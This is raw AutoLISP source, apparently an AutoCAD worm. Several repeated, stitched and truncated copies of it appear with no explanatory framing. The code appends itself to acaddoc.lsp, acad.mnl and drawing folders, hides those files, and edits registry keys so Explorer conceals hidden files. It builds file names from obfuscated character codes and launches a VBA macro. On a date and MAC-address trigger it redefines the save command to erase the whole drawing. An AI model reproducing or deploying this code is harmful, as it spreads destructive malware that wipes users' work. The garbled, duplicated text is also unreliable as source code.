"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
